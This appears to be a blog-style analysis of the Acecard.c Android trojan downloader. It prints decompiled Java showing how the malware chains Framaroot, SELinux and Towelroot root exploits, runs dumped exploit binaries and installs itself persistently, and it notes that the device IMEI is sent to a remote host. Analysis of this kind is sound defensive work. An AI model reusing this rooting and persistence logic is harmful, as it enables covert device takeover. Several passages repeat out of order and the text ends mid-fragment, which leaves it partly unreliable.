A few days ago Kaspersky wrote in its blog about the evolution of a bank trojan for Android named Acerard (https://blog.kaspersky.com/acecard-android-trojan/11368/)
![]()
As per Kasperky newit seems that some version of this Trojan has been found in Google Play store:
"But this is not the only way this malware is distributed. On 28 December 2015, Kaspersky Lab experts were able to spot a version of the Acecard downloader Trojan – Trojan-Downloader.AndroidOS.Acecard.b – in the official Google Play store. The Trojan propagates under the guise of a game. When the malware is installed from Google Play, the user will only see an Adobe Flash Player icon on the desktop screen and no actual sign of the installed application."
The version Kaspersky mentioned is: Downloader.AndroidOS.Acecard.b
However, while doing some research, I found another version with name Downloader.AndroidOS.Acecard.c. . VirusBulletin already talked about it:
"We discovered a new version of trojan downloader: Trojan-Downloader.AndroidOS.Acecard.c. It is distinguished by the use of a vulnerability in the system after launching the trojan that allows it to obtain superuser permissions. Once equipped with these authorizations, Trojan-Downloader.AndroidOS.Acecard.c can install Acecard banking trojan in the system memory, which protects against the suppression via traditional tools. In addition, another trojan which we already know is spread the same way: it is Trojan-Ransom.AndroidOS.Pletor"
So let's take a look to this specimen.
![]()
Looking deeper in the debugger, I find several interesting strings, but one of them bring my attention: Executing exploit...oh wait! is this real?!?!
![]()
In the file system, there is a configuration file with something really funny: a very self-descriptive variable ROOTING_TRYED
![]()
![]()
The method "run" in that "LinuxExplotThread" class invokes several other methods which tries to to get root access in the device through different exploits.
Beside that the malware author did not bother to obfuscate the code or even put names to the classes a bit less self-descriptive, the name of the methods to run the exploits are exactly the same than the vulnerability they try to exploit.
The three exploit methods, runFramaLinuxExploit() runSelinuxExploit() and runTowelExploit() are:
The exploits files are part of the APK file and are stored in a directory name "assets".
![]()
Those files are renamed and used by the different exploits
Once the system is rooted, it is able to perform the installation of other APKs and remain persistent
As per Kasperky newit seems that some version of this Trojan has been found in Google Play store:
"But this is not the only way this malware is distributed. On 28 December 2015, Kaspersky Lab experts were able to spot a version of the Acecard downloader Trojan – Trojan-Downloader.AndroidOS.Acecard.b – in the official Google Play store. The Trojan propagates under the guise of a game. When the malware is installed from Google Play, the user will only see an Adobe Flash Player icon on the desktop screen and no actual sign of the installed application."
The version Kaspersky mentioned is: Downloader.AndroidOS.Acecard.b
However, while doing some research, I found another version with name Downloader.AndroidOS.Acecard.c. . VirusBulletin already talked about it:
"We discovered a new version of trojan downloader: Trojan-Downloader.AndroidOS.Acecard.c. It is distinguished by the use of a vulnerability in the system after launching the trojan that allows it to obtain superuser permissions. Once equipped with these authorizations, Trojan-Downloader.AndroidOS.Acecard.c can install Acecard banking trojan in the system memory, which protects against the suppression via traditional tools. In addition, another trojan which we already know is spread the same way: it is Trojan-Ransom.AndroidOS.Pletor"
So let's take a look to this specimen.
Dynamic analysis
The APK, once installed, looks like a valid Adobe Flash Application.
Looking at the debugging logs and the proxy, first thing I see is an HTTP connection to a host http://brutalmobiletube.com. In the HTTP request the IMEI of the device is sent, plus other information.
¨. ![]()
In the file system, there is a configuration file with something really funny: a very self-descriptive variable ROOTING_TRYED
Static analysis
The code is really 'awesome', and the authors did not really care at all about being a bit 'stealthy' :)
First, here is a class name "LinuxExploitThread" which is quite self-descriptive.
First, here is a class name "LinuxExploitThread" which is quite self-descriptive.
The method "run" in that "LinuxExplotThread" class invokes several other methods which tries to to get root access in the device through different exploits.
publicvoidrun()
{
try
{
boolean bool =this.semaphore.tryAcquire();
if(!bool)
return;
SharedPreferences localSharedPreferences =this.context.getSharedPreferences("app_settings",0);
if(!localSharedPreferences.getBoolean("INSTALL_SENT",false))
Utils.reportInstall(this.context);
if(Status.haveRoot())
{
installPersistent();
return;
}
if(Root.checkFramarootExploitability(this.context))
runFramalinuxExploit();
if(Status.haveRoot())
{
installPersistent();
return;
}
if(Root.checkSELinuxExploitability(this.context))
runSelinuxExploit();
if(Status.haveRoot())
{
installPersistent();
return;
}
if(Root.checkTowelExploitability(this.context))
runTowelExploit();
if(Status.haveRoot())
installPersistent();
while(true)
{
return;
Utils.putBooleanValue(this.context,"ROOTING_TRYED",true, localSharedPreferences);
MainService.reconfigure(this.context);
}
}
finally
{
this.semaphore.release();
}
}
Beside that the malware author did not bother to obfuscate the code or even put names to the classes a bit less self-descriptive, the name of the methods to run the exploits are exactly the same than the vulnerability they try to exploit.
The three exploit methods, runFramaLinuxExploit() runSelinuxExploit() and runTowelExploit() are:
- Frama root exploit: http://forum.xda-developers.com/apps/framaroot/root-framaroot-one-click-apk-to-root-t2130276
- Towell full exploit: http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/
- Selinux Exploit: https://www.exploit-db.com/exploits/35711/
The exploits files are part of the APK file and are stored in a directory name "assets".
Those files are renamed and used by the different exploits
privatevoidrunTowelExploit()
{
String str1 =this.context.getFilesDir().getAbsolutePath();
if((new AutoFile(str1,"vs").exists())&&(checkSelinuxExecution(str1 +"/"+"vs")))
{
Log.d("selinuxExploitThread"," (runTowelExploit) localexploit was already running");
return;
}
try
{
Utils.dumpAsset(this.context,"ob.data","vs");
Utils.dumpAsset(this.context,"jb.data","qj");
Utils.dumpAsset(this.context,"sb.data","ss");
String str2 = String.format("%s/%s %s/%s %s/%s",new Object[]{ str1,"vs", str1,"qj", str1,"ss"});
Execute.execute("/system/bin/chmod 755 "+ str2);
Log.d("selinuxExploitThread"," (runTowelExploit), executing exploit");
int i = Execute.executeSimple(str2).exitCode;
Log.d("selinuxExploitThread"," (runTowelExploit), execution result: "+ i);
checkSelinuxExecution(str1 +"/"+"vs");
return;
}
catch(Exception localException)
{
Log.d("selinuxExploitThread"," (runTowelExploit): Exception : "+ localException.getMessage());
return;
}
finally
{
newFile(str1,"vs").delete();
newFile(str1,"qj").delete();
newFile(str1,"ss").delete();
}
}
Once the system is rooted, it is able to perform the installation of other APKs and remain persistent
1 | privatebooleaninstallPersistent() |